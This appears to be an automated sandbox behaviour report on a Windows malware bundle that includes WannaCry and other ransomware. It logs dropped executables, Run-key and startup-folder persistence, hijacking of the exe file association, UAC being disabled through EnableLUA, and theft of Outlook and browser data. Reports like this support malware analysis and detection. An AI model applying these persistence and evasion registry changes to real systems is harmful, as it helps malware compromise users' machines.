Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\TEMPSP~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\6.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\TEMPEX~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C:\ProgramData\AdobeReader\GeforceUpdater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\6.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\A5D66A~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD7AC9.tmp C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6b5b0cab8df9d59f.tmp C:\Users\Admin\Desktop\8.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\6b5b0cab8df9d59f.tmp C:\Users\Admin\Desktop\8.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD7ADF.tmp C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe C:\PROGRA~3\system.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe C:\PROGRA~3\system.exe N/A
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt C:\Users\Admin\Desktop\8.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DECRYPT-FILES.txt C:\Users\Admin\Desktop\8.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\Desktop\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-KCIOL.tmp\x2s443bc.cs1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SAI7O.tmp\ska2pwej.aeh.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPEX~1.EXE N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TEMPSP~1.EXE N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\Desktop\10.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Users\Admin\Desktop\7.exe N/A
N/A N/A C:\Users\Admin\Desktop\8.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\PROGRA~3\system.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Windows\System32\L2SecHC\dllhost.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svchost.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
N/A N/A C:\ProgramData\AdobeReader\GeforceUpdater.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\A5D66A~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Uses the VBS compiler for execution

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8 = "\"C:\\Documents and Settings\\8.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Documents and Settings\\RuntimeBroker.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\System32\\L2SecHC\\dllhost.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Yahoo Messengger = "C:\\Windows\\system32\\RVHOST.exe" C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Endermanch@NoMoreRansom = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\RIP_YOUR_PC_LOL\\[email protected]\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Endermanch@WannaCrypt0r = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\00000000\\[email protected]\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." C:\PROGRA~3\system.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7 = "\"C:\\Users\\Admin\\Desktop\\LockApprove.wma\\7.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Admin\\3D Objects\\Idle.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\mpr\\RuntimeBroker.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BlockHost.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\Files\\Winlog.exe" C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4363463463464363463463463 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\4363463463464363463463463\\4363463463464363463463463.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Windows Mail\\dwm.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" C:\Users\Admin\Desktop\7.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." C:\PROGRA~3\system.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.VisualElementsManifest\\msedge.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ Ransomware = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3582-490\\bot.exe" C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Documents and Settings\\smss.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\WerFault\\RuntimeBroker.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x2s443bc.cs1.tmp = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\is-KCIOL.tmp\\x2s443bc.cs1.tmp.exe\"" C:\Users\Admin\Desktop\6.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\sc\\RuntimeBroker.exe\"" C:\Users\Admin\Desktop\6.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\System32\L2SecHC\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\6.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\6.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\System32\L2SecHC\dllhost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\x: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\y: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\a: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\u: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\v: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\y: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\z: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\w: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\m: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\n: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\q: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\m: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\g: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\t: C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened (read-only) \??\l: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\b: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\e: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
File opened (read-only) \??\n: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe N/A
